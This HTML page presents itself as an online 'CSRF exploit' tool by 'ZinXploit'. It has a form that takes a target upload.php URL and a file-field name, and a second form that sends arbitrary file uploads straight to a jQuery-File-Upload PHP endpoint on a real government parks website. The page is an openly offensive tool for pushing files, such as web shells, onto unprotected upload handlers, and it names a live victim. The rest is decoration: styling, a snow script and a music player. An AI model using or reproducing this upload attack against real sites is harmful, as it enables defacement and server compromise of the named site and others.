<html>

<head>
  <meta property="og:title" content="Tools CSRF ONLINE BY ./ZinXploit" />
  <meta property="og:description" content="Tools CSRF ONLINE BY ./ZinXploit" />

  <meta property="og:author" content="By ZinXploit" />
  <link href="https://fonts.googleapis.com/css?family=Audiowide" rel="stylesheet" type="text/css" />
  <link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css" />
</head>
<style>
  body {
    cursor: cross;
    background: #000000 url(https://i.top4top.io/p_3207ch7t70.png) scroll repeat center center;
    background-size: 100% 100%;
    font-family: Calibri;
    margin-top: 35px;
  }

  h1,
  h2 {
    margin-top: .3em;
    margin-bottom: .3em;
  }

  h1.nprinsleyy {
    color: #dbd9d9;
  }

  h2 {
    color: #edc800;
  }

  p.message_prinsley {
    color: #07ad1d;
    margin-top: .25em;
    margin-bottom: .25em;
    font-size: 16px;
    font-weight: unset;
  }

  .hubungi_prinsh {
    color: #00eb00;
    text-decoration: none;
  }

  .hubungi_prinsh:hover {
    color: red
  }

  .othermes_nprinsh {
    color: #dbd9d9;
    font-size: 16px;
  }

  marquee.foonathanPrinsley {
    display: ;
    position: fixed;
    width: 100%;
    bottom: 0px;
    font-family: Tahoma;
    height: 20px;
    color: white;
    left: 0px;
    border-top: 2px solid darkred;
    padding: 5px;
    background-color: #000
  }
</style>
</head>

<body>
  </style>
  <style type="text/css">
    p {
      font-family: serif;
      line-height: 1.75em;
      font-size: 18px;
    }

    i {
      font-family: sans;
      color: orange;
    }
  </style>
  <script type="text/javascript" src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js"></script>
  <script>
    alert("Welcome My CSRF ONLINE BY ./ZinXploit")
  </script>

  <body>

    <body bgcolor="black">
      <b>
        <center>
          <font color='red' size="4">[</font>
          <i>
            <font color='white' size="4">CSRF XPLOIT ONLINE By ZinXploit</font>
          </i>
          <font color='red' size="4">]</font>
        </center>
      </b>
      <center><img src="https://i.top4top.io/p_3207ch7t70.png" border="0" width="200px" height="200px"></center>

      <center>
        <bold>
          <font color='Aqua' size="4">LAKUKAN DENGAN BIJAK YAH! GUNAKAN SEBAIK MUNGKIN JANGAN DI SALAHGUNAKAN.</font>
        </bold>
      </center></b>

      </br></b>

      <center>
        <form method="post">
          <font color='Aqua' size="4">URL : <input type="text" name="url" size="50" height="10"
              placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;"
              required>
      </center>

      <center>
        <br> POST File : <input type="text" name="pf" size="50" height="10"
          placeholder="Filedata / files[] / qqfile / userfile / dll" style="margin: 5px auto; padding-left: 5px;"
          required><br> <input type="submit" name="d" value="Kunci Target!!!">

      </center>

      <center>
        <form method='post' target='_blank'
          action='https://ina.parquesnacionales.gov.co/assets/plugins/jquery-file-upload/server/php/'
          enctype='multipart/form-data'><input type='file' name='files[]'>
      </center>

      <center>
        <input type='submit' name='g' value='Upload!'></form>
      </center>
      </form>

      <center>

        <body>
          <button class="btn btn-primary" onclick="toggleMusic()" id="btn-playback" data-play="false">
            <i class="fa fa-play"></i>
            <span id="btn-text">PLAY</span>
          </button>
          <audio id="audio" src="./Demon Slayer_ Kimetsu no Yaiba - Kamado Tanjirou No Uta (ASO Remix).mp3" />
          <script>
            const myAudio = document.getElementById("audio");
            const btn = document.getElementById("btn-playback");
            const btnIcon = document.querySelector("#btn-playback > i");
            const btnText = document.getElementById("btn-text");

            const toggleMusic = () => {
              const dataPlay = btn.getAttribute('data-play');

              if (dataPlay === 'false') {
                btn.setAttribute('data-play', 'true');
                myAudio.play();
                btnIcon.classList.remove("fa-play");
                btnIcon.classList.add("fa-pause");
                btnText.innerText = "PAUSE";
              } else {
                btn.setAttribute('data-play', 'false');
                myAudio.pause();
                btnIcon.classList.remove("fa-pause");
                btnIcon.classList.add("fa-play");
                btnText.innerText = "PLAY";
              }
            };

            myAudio.onpause = () => {
              btn.setAttribute('data-play', 'false');
              myAudio.pause();
              btnIcon.classList.remove("fa-pause");
              btnIcon.classList.add("fa-play");
              btnText.innerText = "PLAY";
            };
          </script>
          </audio>
        </body>
      </center>
      </form>
    </body>

</html>
